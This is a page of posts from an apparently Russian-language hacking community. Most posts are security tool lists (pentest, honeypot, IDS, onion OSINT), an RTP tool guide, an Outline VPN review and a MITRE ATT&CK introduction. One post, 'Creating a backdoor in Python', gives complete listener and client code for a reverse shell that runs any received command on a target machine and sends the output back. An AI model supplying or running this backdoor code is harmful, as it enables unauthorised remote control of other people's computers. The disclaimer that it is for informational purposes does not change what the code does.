Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг

Life-Hack [Жизнь-Взлом]/Хакинг

274 поста 2 809 подписчиков

Популярные теги в сообществе:

537

Расширения Google Chrome для хакеров

1️⃣ Wappalzyer - получает самую свежую информацию о том, какие технологии использует любой веб-сайт (веб-приложение).

2️⃣ User Agent switcher - подделывает ответ пользовательского агента, который он отправляет на веб-сайт о вашем устройстве, размере экрана и т. д.

3️⃣ Retire.js - позволяет вам обнаруживать (находить) любые скрытые устаревшие версии javascript, которые можно использовать для атаки.

4️⃣ Cookie editor - позволяет любому пользователю редактировать файлы cookie. Этот инструмент полезен при захвате уязвимой сессии.

5️⃣ Hackbar - расширение для тестирования на проникновение. Hackbar похож на burpsuite, но в браузере.

Мы в телеграме!

Создание бэкдора на Python1

Бэкдор — это инструмент, который позволяет хакеру удаленно подключиться к целевой машине. В этой статье я покажу, как создать простой бэкдор на Pyhton

Основная цель бэкдора — отправлять и выполнять команды и получить удаленный доступ к файлам на целевой системе.

Создание бэкдора на Python

Во-первых, мы должны создать сервер, на котором будем работать. Сервер будет состоять из четырех частей:

1) Получение нашего локального IP и указанного порта.

2) Привязка IP-адреса и порта для создания сокета.

3) Запуск слушателя.

4) Отправка и получение команд в бесконечном цикле.

# Imports

import socket

# Getting our local IP and a specified port

HOST = '127.0.0.1' # '192.168.43.82'

PORT = 8081 # 2222

new_port = input('Input Host Port (Blank if default).')

if (new_port != "\n"):

REMOTE_PORT = new_port

# Binding the IP to the Port

# Creating a Socket

server = socket.socket()

server.bind((HOST, PORT))

# Starting the Listener

print('[+] Server Started')

print('[+] Listening For Client Connection ...')

server.listen(1)

client, client_addr = server.accept()

print(f'[+] {client_addr} Client connected to the server')

# Sending and receiving commands in an infinite loop

while True:

command = input('Enter Command : ')

command = command.encode()

client.send(command)

print('[+] Command sent')

output = client.recv(1024)

output = output.decode()

print(f"Output: {output}")

Затем мы подключимся к атакующему на основе жестко запрограммированного IP-адреса и порта, поскольку он не может получить их динамически.

Поскольку мы запускаем эту обратную оболочку на локальной машине, сокет будет выглядеть так:

REMOTE_HOST = '127.0.0.1'

REMOTE_PORT = 8081 # 2222

client = socket.socket()

Далее мы должны получать команды и использовать библиотечный подпроцесс для открытия терминала и параллельного запуска команд. Вот как это будет выглядеть:

command = client.recv(1024)

command = command.decode()

op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

Полный код сервера выглядит следующим образом:

# Imports

from ctypes.wintypes import INT

import socket

import subprocess

# Setting Up IP/Sockets

REMOTE_HOST = '127.0.0.1'

REMOTE_PORT = 8081 # 2222

client = socket.socket()

# Initializing Connection

print("[-] Connection Initiating...")

client.connect((REMOTE_HOST, REMOTE_PORT))

print("[-] Connection initiated!")

# Runtime Loop

while True:

print("[-] Awaiting commands...")

command = client.recv(1024)

command = command.decode()

op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

output = op.stdout.read()

output_error = op.stderr.read()

print("[-] Sending response...")

client.send(output + output_error)

Информация предоставлена для ознакомительных целей!
Мы в телеграме!

Показать полностью

RTP Tools

Набор инструментов для тестирования и анализа сетевых соединений на основе протокола RTP, который используется в системах передачи видео, аудио и голосовой связи через Интернет.

Основные инструменты:

1. rtpdump: предназначен для анализа содержимого RTP-потока. Он позволяет просматривать данные RTP-пакета, такие как счетчики, тайминги, нагрузка и т.д.

2. rtpplay: позволяет проигрывать файлы, содержащие RTP-потоки обратно через сеть. Он может быть использован для тестирования RTP приложений и оборудования.

3. rtpsend: генерирует RTP-поток с заданной частотой дискретизации и скоростью передачи данных. Это можно использовать для тестирования оборудования и приложений.

Анализируем RTP-пакеты

rtpdump - это утилита командной строки в Linux, которая позволяет анализировать содержимое RTP-потоков.

Примеры использования:

rtpdump -i eth0 -F ascii > output.txt

Данный пример захватывает все RTP-пакеты на сетевом интерфейсе eth0 и записывает их содержимое в текстовый файл output.txt в формате ASCII.

rtpdump -F hex -n -t 20200101010101 -u 172.16.0.1 < input.pcap > output.txt

Анализ RTP-потока, записанного в файл input.pcap, с использованием формата вывода hex, ограничивая вывод только пакетами с IP-адресом 172.16.0.1, записанными в период с 1 января 2020 года, 01:01:01, и сохраняя результат в файл output.txt.

rtpdump -r input.pcap -s 0 -t 20210101120000 -T s

Отображение статистики RTP-потока, записанного в файл input.pcap с использованием таймстампов из файла pcap, включая информацию о количестве переданных и принятых RTP-пакетов, среднем размере пакетов и задержке в секундах.

Воспроизводим записанные RTP-потоки

rtpplay - это утилита командной строки в Linux, которая позволяет воспроизводить записанные RTP-потоки.

Примеры использования:

rtpplay input.rtp

воспроизводит RTP-поток, записанный в файл input.rtp.

rtpplay -s 10 input.rtp

воспроизводит RTP-поток из файла input.rtp со смещением времени на 10 секунд.

rtpplay -T 50 input.rtp

воспроизводит RTP-поток из файла input.rtp с ограничением скорости 50%.

rtpplay input.rtp &

воспроизводит RTP-поток в фоновом режиме

Отправляем RTP-пакеты на удаленный хост

rtpsend - это утилита командной строки в Linux, которая позволяет отправлять RTP-пакеты на удаленный хост.

Примеры использования:

1. Отправка RTP-пакетов на удаленный хост:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными>

2. Отправка RTP-пакетов с использованием RTCP-отчетности:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -t <интервал RTCP>

3. Отправка RTP-пакетов с заданным TTL:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -T <TTL>

TTL - это время жизни пакета в секундах до его уничтожения, если он так и не достиг назначенного адресата.

Мы в телеграме!

Показать полностью
801

Инструменты тестирования на проникновение в сеть. Часть 2

HoneyPot / HoneyNet

Glastopf – это инструмент для отслеживания инцидентов сетевой безопасности. Может эмулировать тысячи уязвимостей для сбора данных в результате атак, нацеленных на веб-приложения.

Kippo – это SSH HoneyPot среднего взаимодействия, предназначенный для регистрации атак методом перебора.

Kojoney – это низкоуровневая приманка для взаимодействия, которая эмулирует SSH-сервер.

HonSSH – это решение HoneyPot с высоким уровнем взаимодействия. HonSSH будет находиться между злоумышленником и HoneyPot, создавая между ними два отдельных SSH-соединения.

Bifrozt – это NAT-устройство с DHCP-сервером, которое обычно развертывается с одной сетевой картой, подключенной непосредственно к Интернету, и одной сетевой картой, подключенной к внутренней сети.

HoneyDrive – HoneyDrive является ведущим дистрибутивом HoneyPot Linux. Это виртуальное устройство (OVA) с установленным Xubuntu Desktop LTS edition.

Cuckoo Sandbox – это программное обеспечение с открытым исходным кодом для автоматизации анализа подозрительных файлов.

HoneyPy – это открытое программное обеспечение, которое используется для обнаружения и сбора информации о злоумышленниках и их атаках.

Dionaea – это открытый инструмент для отслеживания инцидентов сетевой безопасности. Dionaea был создан для отслеживания различных типов сетевых атаки, включая вирусы, шпионское ПО и т.д.

Conpot (ICS/SCADA HoneyPot) – это низкоинтерактивная приманка для промышленных систем управления на стороне сервера, разработанная для простого развертывания, модификации и расширения.

Amun – приманка с низким уровнем взаимодействия на основе Python.

Полный захват пакетов

OpenFPC – представляет собой набор инструментов, которые в совокупности обеспечивают облегченную систему записи и буферизации сетевого трафика с полным пакетом.

Dshell – это платформа для криминалистического анализа сети. Позволяет быстро разрабатывать плагины для поддержки анализа перехваченных сетевых пакетов.

stenographer – это решение для захвата пакетов, целью которого является быстрая загрузка всех пакетов на диск, а затем предоставление простого и быстрого доступа к подмножествам этих пакетов.

tcpflow – это программа, которая фиксирует данные, передаваемые как часть TCP-соединений, и сохраняет данные удобным для анализа и отладки протокола способом.

Xplico – инструмент для извлечения из интернет-трафика данных, содержащихся в приложениях.

Moloch – это система с открытым исходным кодом для крупномасштабного захвата пакетов IPv4 (PCAP) и индексирования. Для просмотра, поиска и экспорта PCAP предоставляется простой веб-интерфейс.

Средства сетевой безопасности на основе снифферов

Live HTTP headers – это бесплатное дополнение для Firefox, позволяющее просматривать запросы браузера в режиме реального времени.

netsniff-ng – это бесплатный сетевой инструментарий для Linux.

wireshark – это бесплатный анализатор пакетов с открытым исходным кодом.

Мы в телеграме!

Показать полностью

Использование протокола Outline VPN: достоинства и недостатки

Outline VPN использует протокол Shadowsocks для обмена данными между клиентом и сервером.

Особенности протокола

- Shadowsocks обладает быстрой и легкой производительностью за счет использования простых методов шифрования, которые не влияют на скорость соединения.

- Shadowsocks предоставляет гибкие настройки, такие как выбор алгоритмов шифрования, портов и протоколов, которые можно настроить в зависимости от потребностей пользователя.

-  Shadowsocks обеспечивает высокую незаметность и устойчивость благодаря маскировке своего трафика, который похож на обычный HTTPS-трафик, затрудняющий обнаружение или блокирование методами сетевой безопасности.

- Shadowsocks является открытым и сообщественным инструментом, обладающим большим и активным сообществом разработчиков.

Достоинства

1. Легкость использования: Outline VPN не требует от пользователей сложных настроек и технических знаний для создания и запуска собственного VPN-сервера. Он поддерживает Windows, macOS и Linux, а Outline Client доступен для Windows, macOS, Linux, ChromeOS, Android и iOS.

2. Безопасность и конфиденциальность: Outline VPN обеспечивает высокий уровень безопасности и конфиденциальности, шифруя и аутентифицируя трафик пользователей с помощью современных алгоритмов. Его не интересует журнал трафика пользователей или личные данные.

3. Экономия ресурсов: С помощью Outline VPN пользователи могут экономить денежные и ресурсные средства, выбирая местоположение и провайдера своего VPN-сервера и используя самостоятельный хостинг или облачные сервисы, такие как DigitalOcean, Rackspace, Google Cloud Platform и Amazon EC2.

4. Гибкость использования: Outline VPN позволяет пользователям легко делиться доступом к своему VPN-серверу с возможностью создания уникальных ключей доступа и их отправки через электронную почту или социальные сети. Он также масштабируем и гибкий с возможностью поддержки сотен пользователей или простого деления доступа со своими близкими контактами.

Недостатки

1. Анонимность не полна: Использование Outline VPN не скрывает от провайдера интернет-услуг того факта, что пользователь использует VPN-сервер. Это может привести к блокировке или ограничению доступа к VPN-серверу со стороны провайдера или правительства. Кроме того, для увеличения анонимности пользователя, Outline VPN не поддерживает Tor или другие средства.

2. Доступность не гарантирована: Работоспособность Outline VPN зависит от доступности и качества VPN-сервера, который может подвергаться сбоям, атакам или перегрузкам. Если VPN-сервер недоступен или работает медленно, подключение к интернету через Outline VPN невозможно. Пользователи должны следить за обновлениями и безопасностью своего VPN-сервера самостоятельно.

3. Эффективность может быть ущербной: Выбор определенных стран для использования Outline VPN может стать невозможным из-за блокировок или ограничений протокола Shadowsocks. Например, в Китае правительство активно борется с использованием VPN-сервисов и использует различные методы для обнаружения и блокировки трафика Shadowsocks. Решение изменять настройки VPN-сервера или клиента, чтобы обойти эти ограничения, может быть сложным и сопряженным с рисками.

Для устранения этих недостатков и улучшения протокола Outline VPN можно предложить следующие решения и предложения:

Источник

Показать полностью
701

Инструменты OSINT для Onion сайтов

Небольшой список полезных инструментов для работы с сайтами в сети Tor.

Поисковые утилиты:

OnionSearch - https://github.com/megadose/OnionSearch

Darkdump - https://github.com/josh0xA/darkdump

Ahmia Search Engine - ahmia.fi, https://github.com/ahmia/ahmia-site,

DarkSearch - https://darksearch.io/, https://github.com/thehappydinoa/DarkSearch

Katana - https://github.com/adnane-X-tebbaa/Katana

Инструменты для получения onion ссылок:

Hunchly - https://www.hunch.ly/darkweb-osint/

H-Indexer - http://jncyepk6zbnosf4p.onion/onions.html

Tor66 Fresh Onions - http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh

Инструменты для сканирования:

Onionscan - https://github.com/s-rah/onionscan

Onioff - https://github.com/k4m4/onioff

Onion-nmap - https://github.com/milesrichardson/docker-onion-nmap

Краулеры:

TorBot - https://github.com/DedSecInside/TorBot

TorCrawl - https://github.com/MikeMeliz/TorCrawl.py

VigilantOnion - https://github.com/andreyglauzer/VigilantOnion

OnionIngestor - https://github.com/danieleperera/OnionIngestor

Прочее:

DeepDarkCTI - https://github.com/fastfire/deepdarkCTI

Мы в телеграме!

Показать полностью
745

Инструменты тестирования на проникновение в сеть. Часть 1

Сканирование

pig – инструмент для создания пакетов Linux.

scapy – интерактивная программа и библиотека для обработки пакетов на основе python.

Pompem – инструмент сетевой безопасности с открытым исходным кодом, который предназначен для автоматизации поиска эксплойтов в основных базах данных.

Nmap – это бесплатная утилита с открытым исходным кодом для сетевого обнаружения и аудита безопасности.

OpenVAS – это платформа из нескольких сервисов и инструментов, предлагающая комплексное и мощное решение для сканирования и управления уязвимостями.

Платформа Metasploit – одно из лучших средств сетевой безопасности для разработки и выполнения кода эксплойта на удаленной целевой машине.

Kali Linux – это дистрибутив Linux, основанный на Debian и предназначенный для цифровой криминалистики и пентеста.

Мониторинг

sagan – инструмент, использующий схожий со Snort движок и правила для анализа журналов (системный журнал / журнал событий /snmptrap / netflow /etc).

Платформа безопасности узлов (Node Security Platform) – это бесплатный инструмент, который используется для обнаружения и устранения уязвимостей в зависимостях проекта Node.js.

ntopng – это инструмент для проверки сетевого трафика.

Fibratus – это инструмент для исследования и отслеживания ядра Windows. Способен фиксировать большую часть активности ядра Windows – создание и завершение процессов / потоков, ввод-вывод файловой системы, реестр, сетевую активность, загрузку / выгрузку DLL и многое другое.

Определители сетевых вторжений

AIEngine – это интерактивный / программируемый движок проверки пакетов следующего поколения на Python / Ruby / Java / Lua с возможностями обучения без какого-либо вмешательства человека, функциями NIDS (Network Intrusion Detection System), классификацией доменов DNS, сборщиком сетевых данных, сетевой экспертизой и многими другими.

Denyhosts – инструмент для предотвращения атак на основе словаря SSH и атак методом перебора.

Fail2Ban – инструмент для сканирования файлов журналов и выполнения ряда действия с IP-адресами, которые демонстрируют вредоносное поведение.

SSHGuard – программное обеспечение для защиты служб в дополнение к SSH, написанное на C.

Lynis – инструмент аудита безопасности с открытым исходным кодом для Linux /Unix.

Snort – это бесплатная система предотвращения сетевых вторжений с открытым исходным кодом (NIPS) и система обнаружения сетевых вторжений (NIDS).

Zeek (ранее Bro) – это мощная платформа сетевого анализа c открытым исходным кодом.

OSSEC – это масштабируемая мультиплатформенная система обнаружения вторжений на базе хоста с открытым исходным кодом (HIDS).

Suricata – это открытое программное обеспечение для обнаружения инцидентов информационной безопасности (IDS), которое используется для обнаружения сетевых атак и нежелательного трафика.

Security Onion – это дистрибутив Linux для обнаружения вторжений, мониторинга сетевой безопасности и управления журналами.

sshwatch – IP-адреса для SSH, похожие на DenyHosts, написанные на Python.

Stealth – проверка целостности файлов, которая практически не оставляет следов.

Мы в телеграме!

Показать полностью

Введение в MITRE ATT&CK и почему она важна для кибербезопасности

MITRE ATT&CK представляет собой аббревиатуру, расшифровываемую как Adversarial Tactics, Techniques and Common Knowledge (Тактики, Техники и Общие Знания Противника).

Это база знаний, которая содержит информацию о том, как киберпротивники атакуют свои цели, какие инструменты и методы они используют, какие следы они оставляют и каким образом этим можно противодействовать.

Организация MITRE является некоммерческой и занимается научно-исследовательской и консультационной деятельностью в интересах общества. Созданная в 1958 году для поддержки проектов военно-воздушных сил США, она расширила свою деятельность до других областей, в том числе кибербезопасности.

Использование MITRE ATT&CK позволяет улучшить безопасность систем и сетей путем изучения способов атак, применяемых хакерами, которые могут использовать различные техники и инструменты для проведения атак. База знаний MITRE ATT&CK содержит информацию о тактиках, техниках и узнаваемых образцах поведения хакеров и может помочь компаниям и организациям в создании стратегии защиты от кибератак.

Как использовать MITRE ATT&CK для повышения безопасности.

База знаний ATT&CK предоставляет общий язык и рамки для разработки конкретных моделей угроз и методологий защиты,

чьл позволяет проводить анализ угроз, изучать профили киберпреступников, создавать реалистичные сценарии атак, оценивать продукты и решения в области кибербезопасности и повышать квалификацию специалистов.

Инструменты для работы с MITRE ATT&CK?

Официальная база знаний

Веб приложение для визуализации бд

Сертификация MITRE ATT&CK Defender

Центра защиты от угроз

Оценки MITRE ATT&CK

Мы в телеграме!

Показать полностью
Отличная работа, все прочитано!